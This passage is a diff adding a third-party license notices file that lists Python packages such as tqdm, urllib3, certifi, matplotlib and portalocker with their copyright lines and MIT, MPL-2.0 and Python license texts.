+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+tqdm 4.62.3 - MIT
+
+
+Copyright (c) 2013
+(c) Noam Yorav-Raphael
+(c) Casper da Costa-Luis casperdcl (https://github.com/casperdcl).
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+urllib3 1.26.7 - MIT
+
+
+Copyright 2015 Google Inc.
+Copyright (c) 2015-2016 Will Bond <will@wbond.net>
+Copyright (c) 2012 Senko Rasic <senko.rasic@dobarkod.hr>
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+wcwidth 0.2.5 - MIT
+
+
+Copyright (c) 2014 Jeff Quast <contact@jeffquast.com>
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+zipp 3.7.0 - MIT
+
+
+Copyright Jason R. Coombs
+
+MIT License
+
+Copyright (c) <year> <copyright holders>
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+certifi 2021.10.8 - MPL-2.0
+
+
+(c) 2006 Entrust, Inc.
+(c) 1999 Entrust.net Limited
+(c) 2009 Entrust, Inc. - for
+(c) 2012 Entrust, Inc. - for
+(c) 2015 Entrust, Inc. - for
+(c) 2006 Entrust, Inc. Label Entrust Root Certification
+(c) 1999 Entrust.net Limited Label Entrust.net Premium 2048 Secure Server CA Serial
+
+Mozilla Public License Version 2.0
+
+   1. Definitions
+
+      1.1. "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns Covered Software.
+
+      1.2. "Contributor Version" means the combination of the Contributions of others (if any) used by a Contributor and that particular Contributor's Contribution.
+
+      1.3. "Contribution" means Covered Software of a particular Contributor.
+
+      1.4. "Covered Software" means Source Code Form to which the initial Contributor has attached the notice in Exhibit A, the Executable Form of such Source Code Form, and Modifications of such Source Code Form, in each case including portions thereof.
+
+      1.5. "Incompatible With Secondary Licenses" means
+
+         (a) that the initial Contributor has attached the notice described in Exhibit B to the Covered Software; or
+
+         (b) that the Covered Software was made available under the terms of version 1.1 or earlier of the License, but not also under the terms of a Secondary License.
+
+      1.6. "Executable Form" means any form of the work other than Source Code Form.
+
+      1.7. "Larger Work" means a work that combines Covered Software with other material, in a separate file or files, that is not Covered Software.
+
+      1.8. "License" means this document.
+
+      1.9. "Licensable" means having the right to grant, to the maximum extent possible, whether at the time of the initial grant or subsequently, any and all of the rights conveyed by this License.
+
+      1.10. "Modifications" means any of the following:
+
+         (a) any file in Source Code Form that results from an addition to, deletion from, or modification of the contents of Covered Software; or
+
+         (b) any new file in Source Code Form that contains any Covered Software.
+
+      1.11. "Patent Claims" of a Contributor means any patent claim(s), including without limitation, method, process, and apparatus claims, in any patent Licensable by such Contributor that would be infringed, but for the grant of the License, by the making, using, selling, offering for sale, having made, import, or transfer of either its Contributions or its Contributor Version.
+
+      1.12. "Secondary License" means either the GNU General Public License, Version 2.0, the GNU Lesser General Public License, Version 2.1, the GNU Affero General Public License, Version 3.0, or any later versions of those licenses.
+
+      1.13. "Source Code Form" means the form of the work preferred for making modifications.
+
+      1.14. "You" (or "Your") means an individual or a legal entity exercising rights under this License. For legal entities, "You" includes any entity that controls, is controlled by, or is under common control with You. For purposes of this definition, "control" means (a) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (b) ownership of more than fifty percent (50%) of the outstanding shares or beneficial ownership of such entity.
+
+   2. License Grants and Conditions
+
+      2.1. Grants
+
+      Each Contributor hereby grants You a world-wide, royalty-free, non-exclusive license:
+
+         (a) under intellectual property rights (other than patent or trademark) Licensable by such Contributor to use, reproduce, make available, modify, display, perform, distribute, and otherwise exploit its Contributions, either on an unmodified basis, with Modifications, or as part of a Larger Work; and
+
+         (b) under Patent Claims of such Contributor to make, use, sell, offer for sale, have made, import, and otherwise transfer either its Contributions or its Contributor Version.
+
+      2.2. Effective Date
+
+      The licenses granted in Section 2.1 with respect to any Contribution become effective for each Contribution on the date the Contributor first distributes such Contribution.
+
+      2.3. Limitations on Grant Scope
+
+      The licenses granted in this Section 2 are the only rights granted under this License. No additional rights or licenses will be implied from the distribution or licensing of Covered Software under this License. Notwithstanding Section 2.1(b) above, no patent license is granted by a Contributor:
+
+         (a) for any code that a Contributor has removed from Covered Software; or
+
+         (b) for infringements caused by: (i) Your and any other third party's modifications of Covered Software, or (ii) the combination of its Contributions with other software (except as part of its Contributor Version); or
+
+         (c) under Patent Claims infringed by Covered Software in the absence of its Contributions.
+
+      This License does not grant any rights in the trademarks, service marks, or logos of any Contributor (except as may be necessary to comply with the notice requirements in Section 3.4).
+
+      2.4. Subsequent Licenses
+
+      No Contributor makes additional grants as a result of Your choice to distribute the Covered Software under a subsequent version of this License (see Section 10.2) or under the terms of a Secondary License (if permitted under the terms of Section 3.3).
+
+      2.5. Representation
+
+      Each Contributor represents that the Contributor believes its Contributions are its original creation(s) or it has sufficient rights to grant the rights to its Contributions conveyed by this License.
+
+      2.6. Fair Use
+
+      This License is not intended to limit any rights You have under applicable copyright doctrines of fair use, fair dealing, or other equivalents.
+
+      2.7. Conditions
+
+      Sections 3.1, 3.2, 3.3, and 3.4 are conditions of the licenses granted in Section 2.1.
+
+   3. Responsibilities
+
+      3.1. Distribution of Source Form
+
+      All distribution of Covered Software in Source Code Form, including any Modifications that You create or to which You contribute, must be under the terms of this License. You must inform recipients that the Source Code Form of the Covered Software is governed by the terms of this License, and how they can obtain a copy of this License. You may not attempt to alter or restrict the recipients' rights in the Source Code Form.
+
+      3.2. Distribution of Executable Form
+
+      If You distribute Covered Software in Executable Form then:
+
+         (a) such Covered Software must also be made available in Source Code Form, as described in Section 3.1, and You must inform recipients of the Executable Form how they can obtain a copy of such Source Code Form by reasonable means in a timely manner, at a charge no more than the cost of distribution to the recipient; and
+
+         (b) You may distribute such Executable Form under the terms of this License, or sublicense it under different terms, provided that the license for the Executable Form does not attempt to limit or alter the recipients' rights in the Source Code Form under this License.
+
+      3.3. Distribution of a Larger Work
+
+      You may create and distribute a Larger Work under terms of Your choice, provided that You also comply with the requirements of this License for the Covered Software. If the Larger Work is a combination of Covered Software with a work governed by one or more Secondary Licenses, and the Covered Software is not Incompatible With Secondary Licenses, this License permits You to additionally distribute such Covered Software under the terms of such Secondary License(s), so that the recipient of the Larger Work may, at their option, further distribute the Covered Software under the terms of either this License or such Secondary License(s).
+
+      3.4. Notices
+
+      You may not remove or alter the substance of any license notices (including copyright notices, patent notices, disclaimers of warranty, or limitations of liability) contained within the Source Code Form of the Covered Software, except that You may alter any license notices to the extent required to remedy known factual inaccuracies.
+
+      3.5. Application of Additional Terms
+
+      You may choose to offer, and to charge a fee for, warranty, support, indemnity or liability obligations to one or more recipients of Covered Software. However, You may do so only on Your own behalf, and not on behalf of any Contributor. You must make it absolutely clear that any such warranty, support, indemnity, or liability obligation is offered by You alone, and You hereby agree to indemnify every Contributor for any liability incurred by such Contributor as a result of warranty, support, indemnity or liability terms You offer. You may include additional disclaimers of warranty and limitations of liability specific to any jurisdiction.
+
+   4. Inability to Comply Due to Statute or Regulation
+
+   If it is impossible for You to comply with any of the terms of this License with respect to some or all of the Covered Software due to statute, judicial order, or regulation then You must: (a) comply with the terms of this License to the maximum extent possible; and (b) describe the limitations and the code they affect. Such description must be placed in a text file included with all distributions of the Covered Software under this License. Except to the extent prohibited by statute or regulation, such description must be sufficiently detailed for a recipient of ordinary skill to be able to understand it.
+
+   5. Termination
+
+      5.1. The rights granted under this License will terminate automatically if You fail to comply with any of its terms. However, if You become compliant, then the rights granted under this License from a particular Contributor are reinstated (a) provisionally, unless and until such Contributor explicitly and finally terminates Your grants, and (b) on an ongoing basis, if such Contributor fails to notify You of the non-compliance by some reasonable means prior to 60 days after You have come back into compliance. Moreover, Your grants from a particular Contributor are reinstated on an ongoing basis if such Contributor notifies You of the non-compliance by some reasonable means, this is the first time You have received notice of non-compliance with this License from such Contributor, and You become compliant prior to 30 days after Your receipt of the notice.
+
+      5.2. If You initiate litigation against any entity by asserting a patent infringement claim (excluding declaratory judgment actions, counter-claims, and cross-claims) alleging that a Contributor Version directly or indirectly infringes any patent, then the rights granted to You by any and all Contributors for the Covered Software under Section 2.1 of this License shall terminate.
+
+      5.3. In the event of termination under Sections 5.1 or 5.2 above, all end user license agreements (excluding distributors and resellers) which have been validly granted by You or Your distributors under this License prior to termination shall survive termination.
+
+   6. Disclaimer of Warranty
+
+   Covered Software is provided under this License on an "as is" basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the Covered Software is free of defects, merchantable, fit for a particular purpose or non-infringing. The entire risk as to the quality and performance of the Covered Software is with You. Should any Covered Software prove defective in any respect, You (not any Contributor) assume the cost of any necessary servicing, repair, or correction. This disclaimer of warranty constitutes an essential part of this License. No use of any Covered Software is authorized under this License except under this disclaimer.
+
+   7. Limitation of Liability
+
+   Under no circumstances and under no legal theory, whether tort (including negligence), contract, or otherwise, shall any Contributor, or anyone who distributes Covered Software as permitted above, be liable to You for any direct, indirect, special, incidental, or consequential damages of any character including, without limitation, damages for lost profits, loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses, even if such party shall have been informed of the possibility of such damages. This limitation of liability shall not apply to liability for death or personal injury resulting from such party's negligence to the extent applicable law prohibits such limitation. Some jurisdictions do not allow the exclusion or limitation of incidental or consequential damages, so this exclusion and limitation may not apply to You.
+
+   8. Litigation
+
+   Any litigation relating to this License may be brought only in the courts of a jurisdiction where the defendant maintains its principal place of business and such litigation shall be governed by laws of that jurisdiction, without reference to its conflict-of-law provisions. Nothing in this Section shall prevent a party's ability to bring cross-claims or counter-claims.
+
+   9. Miscellaneous
+
+   This License represents the complete agreement concerning the subject matter hereof. If any provision of this License is held to be unenforceable, such provision shall be reformed only to the extent necessary to make it enforceable. Any law or regulation which provides that the language of a contract shall be construed against the drafter shall not be used to construe this License against a Contributor.
+
+   10. Versions of the License
+
+      10.1. New Versions
+
+      Mozilla Foundation is the license steward. Except as provided in Section 10.3, no one other than the license steward has the right to modify or publish new versions of this License. Each version will be given a distinguishing version number.
+
+      10.2. Effect of New Versions
+
+      You may distribute the Covered Software under the terms of the version of the License under which You originally received the Covered Software, or under the terms of any subsequent version published by the license steward.
+
+      10.3. Modified Versions
+
+      If you create software not governed by this License, and you want to create a new license for such software, you may create and use a modified version of this License if you rename the license and remove any references to the name of the license steward (except to note that such modified license differs from this License).
+
+      10.4. Distributing Source Code Form that is Incompatible With Secondary Licenses
+
+      If You choose to distribute Source Code Form that is Incompatible With Secondary Licenses under the terms of this version of the License, the notice described in Exhibit B of this License must be attached. Exhibit A - Source Code Form License Notice
+
+This Source Code Form is subject to the terms of the Mozilla Public License, v. 2.0. If a copy of the MPL was not distributed with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
+
+If it is not possible or desirable to put the notice in a particular file, then You may include the notice in a location (such as a LICENSE file in a relevant directory) where a recipient would be likely to look for such a notice.
+
+You may add additional accurate notices of copyright ownership.
+
+Exhibit B - "Incompatible With Secondary Licenses" Notice
+
+This Source Code Form is "Incompatible With Secondary Licenses", as defined by the Mozilla Public License, v. 2.0.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+typing-extensions 4.0.1 - OTHER
+
+
+Copyright (c) 1991 - 1995, Stichting Mathematisch Centrum Amsterdam
+Copyright (c) 1995-2001 Corporation for National Research Initiatives
+Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014 Python Software Foundation
+
+OTHER
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+defusedxml 0.7.1 - PSF-2.0
+
+
+
+PSF-2.0
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+matplotlib 3.5.1 - PSF-2.0
+
+
+coprod 97
+(c) Tavmjong Bah
+(c) Tavmjung Bah
+(c) Frank Siegert 1996
+Copyright (c) 2007-2008
+Fonts are (c) Bitstream
+b'Copyright xa9 2017 No
+Copyright <http://www.ams.org>
+X11R4 release, copyright M.I.T.
+Copyright 2010-2012, Google Inc.
+Copyright (c) 2002 Hansruedi Baer
+Copyright (c) 2003 Hansruedi Baer
+Copyright (c) 2009 Pierre Raybaut
+Copyright (c) 2010 Doug Hellmann.
+Copyright (c) 2006 by Tavmjong Bah.
+Copyright (c) 2011 Ethan Schoonover
+Copyright xa9 2017 No one. FontBBox
+Copyright (c) 2002 by Kevin B. Kenny.
+Copyright (c) 2003 by Bitstream, Inc.
+Copyright (c) 2010, Bartosz Telenczuk
+copyright 2014, Matplotlib developers
+Copyright (c) 1994, Basil K. Malyshev.
+Copyright (c) 2002-2011 John D. Hunter
+ECopyright (c) 2003 by Bitstream, Inc.
+FCopyright (c) 2003 by Bitstream, Inc.
+hCopyright (c) 2003 by Bitstream, Inc.
+coproduct Comment Ascending 98, 99, 100
+Copyright (c) 2001-2004 by Fredrik Lundh
+Copyright (c) 2002-2005 Maxim Shemanarev
+Copyright 2004 John Gill and John Hunter
+Copyright The Matplotlib development team
+Copyright (c) 1993-1996 Lucent Technologies.
+Copyright (c) 1994, 1995, Basil K. Malyshev.
+Portions copyright (c) 1990 by Elsevier, Inc.
+Copyright (c) 1994-1998 Sun Microsystems, Inc.
+Copyright (c) 2012- Matplotlib Development Team
+Copyright (c) 2001-2005 by the STI Pub Companies
+Copyright (c) 2001-2010 by the STI Pub Companies
+1Copyright (c) 2001-2010 by the STI Pub Companies
+Copyright (c) 1997 American Mathematical Society.
+Copyright (c) 1998-2000 by Scriptics Corporation.
+Copyright 1995, Trinity College Computing Center.
+LCopyright (c) 2001-2010 by the STI Pub Companies
+Copyright (c) 2010-2013 by tyPoland Lukasz Dziedzic
+Copyright (c) 1989, 1991 Adobe Systems Incorporated.
+Copyright (c) 2005 Tony Juricic (tonygeek@yahoo.com)
+Portions copyright (c) 1998-2003 by MicroPress, Inc.
+Copyright (c) 1997, 2009 American Mathematical Society
+Copyright (c) Jeremy O'Donoghue & John Hunter, 2003-4.
+Copyright (c) 1985, 1987, 1988 Adobe Systems Incorporated.
+Copyright (c) 1989, 1990, 1991 Adobe Systems Incorporated.
+Copyright (c) 2009 John Horigan (http://www.antigrain.com)
+Copyright (c) 1989, 1990, 1991, Adobe Systems Incorporated.
+Copyright (c) 1985, 1987, 1988, 1989 Adobe Systems Incorporated.
+Copyright (c) 1985, 1987, 1988, 1991 Adobe Systems Incorporated.
+Copyright (c) 1985, 1987, 1989, 1990 Adobe Systems Incorporated.
+Copyright (c) 1985, 1987, 1989, 1991 Adobe Systems Incorporated.
+Copyright (c) 1985, 1987, 1989, 1992 Adobe Systems Incorporated.
+Copyright (c) 1996. The Regents of the University of California.
+Copyright (c) 2002-2005 Maxim Shemanarev (http://antigrain.com/)
+Copyright (c) 2003-2004 Andrew Straw, Jeremy O'Donoghue and others
+Copyright (c) 2002-2005 Maxim Shemanarev (http://www.antigrain.com)
+Copyright (c) 1987-1994 The Regents of the University of California.
+Copyright (c) 1985, 1987, 1988, 1989, 1997 Adobe Systems Incorporated.
+Copyright (c) 1985, 1987, 1989, 1990, 1991 Adobe Systems Incorporated.
+Copyright (c) 1985, 1987, 1989, 1990, 1997 Adobe Systems Incorporated.
+Copyright (c) 1989, 1990, 1991, 1993, 1997 Adobe Systems Incorporated.
+Copyright (c) 1985, 1987, 1989, 1990, 1993, 1997 Adobe Systems Incorporated.
+Copyright (c) 1989, 1990, 1991, 1992, 1993, 1997 Adobe Systems Incorporated.
+Copyright (c) 1997, 2009, American Mathematical Society (http://www.ams.org).
+Copyright (c) 2002 Cynthia Brewer, Mark Harrower, and The Pennsylvania State University.
+copyrighted by the Regents of the University of California, Sun Microsystems, Inc., Scriptics Corporation
+copyright 2002 - 2012 John Hunter, Darren Dale, Eric Firing, Michael Droettboom and the Matplotlib development team f'2012 - sourceyear The Matplotlib development team
+
+PSF-2.0
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+pywin32 303 - PSF-2.0
+
+
+
+PSF-2.0
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+portalocker 1.7.1 - Python-2.0
+
+
+Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 Python Software Foundation
+
+PYTHON SOFTWARE FOUNDATION LICENSE VERSION 2
+
+   1. This LICENSE AGREEMENT is between the Python Software Foundation ("PSF"), and the Individual or Organization ("Licensee") accessing and otherwise using this software ("Python") in source or binary form and its associated documentation.
+
+   2. Subject to the terms and conditions of this License Agreement, PSF hereby grants Licensee a nonexclusive, royalty-free, world-wide license to reproduce, analyze, test, perform and/or display publicly, prepare derivative works, distribute, and otherwise use Python alone or in any derivative version, provided, however, that PSF's License Agreement and PSF's notice of copyright, i.e., "Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006 Python Software Foundation; All Rights Reserved" are retained in Python alone or in any derivative version prepared by Licensee.
+
+   3. In the event Licensee prepares a derivative work that is based on or incorporates Python or any part thereof, and wants to make the derivative work available to others as provided herein, then Licensee hereby agrees to include in any such work a brief summary of the changes made to Python.
+
+   4. PSF is making Python available to Licensee on an "AS IS" basis. PSF MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.
+
+   5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON, OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
+
+   6. This License Agreement will automatically terminate upon a material breach of its terms and conditions.
+
+   7. Nothing in this License Agreement shall be deemed to create any relationship of agency, partnership, or joint venture between PSF and Licensee. This License Agreement does not grant permission to use PSF trademarks or trade name in a trademark sense to endorse or promote products or services of Licensee, or any third party.
+
+   8. By copying, installing or otherwise using Python, Licensee agrees to be bound by the terms and conditions of this License Agreement. BEOPEN.COM LICENSE AGREEMENT FOR PYTHON 2.0
+
+BEOPEN PYTHON OPEN SOURCE LICENSE AGREEMENT VERSION 1
+
+   1. This LICENSE AGREEMENT is between BeOpen.com ("BeOpen"), having an office at 160 Saratoga Avenue, Santa Clara, CA 95051, and the Individual or Organization ("Licensee") accessing and otherwise using this software in source or binary form and its associated documentation ("the Software").
+
+   2. Subject to the terms and conditions of this BeOpen Python License Agreement, BeOpen hereby grants Licensee a non-exclusive, royalty-free, world-wide license to reproduce, analyze, test, perform and/or display publicly, prepare derivative works, distribute, and otherwise use the Software alone or in any derivative version, provided, however, that the BeOpen Python License is retained in the Software, alone or in any derivative version prepared by Licensee.
+
+   3. BeOpen is making the Software available to Licensee on an "AS IS" basis. BEOPEN MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, BEOPEN MAKES NO AND DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF THE SOFTWARE WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.
+
+   4. BEOPEN SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE SOFTWARE FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF USING, MODIFYING OR DISTRIBUTING THE SOFTWARE, OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
+
+   5. This License Agreement will automatically terminate upon a material breach of its terms and conditions.
+
+   6. This License Agreement shall be governed by and interpreted in all respects by the law of the State of California, excluding conflict of law provisions. Nothing in this License Agreement shall be deemed to create any relationship of agency, partnership, or joint venture between BeOpen and Licensee. This License Agreement does not grant permission to use BeOpen trademarks or trade names in a trademark sense to endorse or promote products or services of Licensee, or any third party. As an exception, the "BeOpen Python" logos available at http://www.pythonlabs.com/logos.html may be used according to the permissions granted on that web page.
+
+   7. By copying, installing or otherwise using the software, Licensee agrees to be bound by the terms and conditions of this License Agreement. CNRI OPEN SOURCE LICENSE AGREEMENT (for Python 1.6b1) IMPORTANT: PLEASE READ THE FOLLOWING AGREEMENT CAREFULLY.
+
+BY CLICKING ON "ACCEPT" WHERE INDICATED BELOW, OR BY COPYING, INSTALLING OR OTHERWISE USING PYTHON 1.6, beta 1 SOFTWARE, YOU ARE DEEMED TO HAVE AGREED TO THE TERMS AND CONDITIONS OF THIS LICENSE AGREEMENT.
+
+   1. This LICENSE AGREEMENT is between the Corporation for National Research Initiatives, having an office at 1895 Preston White Drive, Reston, VA 20191 ("CNRI"), and the Individual or Organization ("Licensee") accessing and otherwise using Python 1.6, beta 1 software in source or binary form and its associated documentation, as released at the www.python.org Internet site on August 4, 2000 ("Python 1.6b1").
+
+   2. Subject to the terms and conditions of this License Agreement, CNRI hereby grants Licensee a non-exclusive, royalty-free, world-wide license to reproduce, analyze, test, perform and/or display publicly, prepare derivative works, distribute, and otherwise use Python 1.6b1 alone or in any derivative version, provided, however, that CNRIs License Agreement is retained in Python 1.6b1, alone or in any derivative version prepared by Licensee.
+
+   Alternately, in lieu of CNRIs License Agreement, Licensee may substitute the following text (omitting the quotes): "Python 1.6, beta 1, is made available subject to the terms and conditions in CNRIs License Agreement. This Agreement may be located on the Internet using the following unique, persistent identifier (known as a handle): 1895.22/1011. This Agreement may also be obtained from a proxy server on the Internet using the URL:http://hdl.handle.net/1895.22/1011".
+
+   3. In the event Licensee prepares a derivative work that is based on or incorporates Python 1.6b1 or any part thereof, and wants to make the derivative work available to the public as provided herein, then Licensee hereby agrees to indicate in any such work the nature of the modifications made to Python 1.6b1.
+
+   4. CNRI is making Python 1.6b1 available to Licensee on an "AS IS" basis. CNRI MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, CNRI MAKES NO AND DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON 1.6b1 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.
+
+   5. CNRI SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE SOFTWARE FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF USING, MODIFYING OR DISTRIBUTING PYTHON 1.6b1, OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
+
+   6. This License Agreement will automatically terminate upon a material breach of its terms and conditions.
+
+   7. This License Agreement shall be governed by and interpreted in all respects by the law of the State of Virginia, excluding conflict of law provisions. Nothing in this License Agreement shall be deemed to create any relationship of agency, partnership, or joint venture between CNRI and Licensee. This License Agreement does not grant permission to use CNRI trademarks or trade name in a trademark sense to endorse or promote products or services of Licensee, or any third party.
+
+   8. By clicking on the "ACCEPT" button where indicated, or by copying, installing or otherwise using Python 1.6b1, Licensee agrees to be bound by the terms and conditions of this License Agreement. ACCEPT CWI LICENSE AGREEMENT FOR PYTHON 0.9.0 THROUGH 1.2
+
+Copyright (c) 1991 - 1995, Stichting Mathematisch Centrum Amsterdam, The Netherlands. All rights reserved.
+
+Permission to use, copy, modify, and distribute this software and its documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appear in all copies and that both that copyright notice and this permission notice appear in supporting documentation, and that the name of Stichting Mathematisch Centrum or CWI not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission.
+
+STICHTING MATHEMATISCH CENTRUM DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO EVENT SHALL STICHTING MATHEMATISCH CENTRUM BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+typing 3.10.0.0 - Python-2.0
+
+
+Copyright (c) 1991 - 1995, Stichting Mathematisch Centrum Amsterdam
+Copyright (c) 1995-2001 Corporation for National Research Initiatives
+Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014 Python Software Foundation
+
+PYTHON SOFTWARE FOUNDATION LICENSE VERSION 2
+
+   1. This LICENSE AGREEMENT is between the Python Software Foundation ("PSF"), and the Individual or Organization ("Licensee") accessing and otherwise using this software ("Python") in source or binary form and its associated documentation.
+
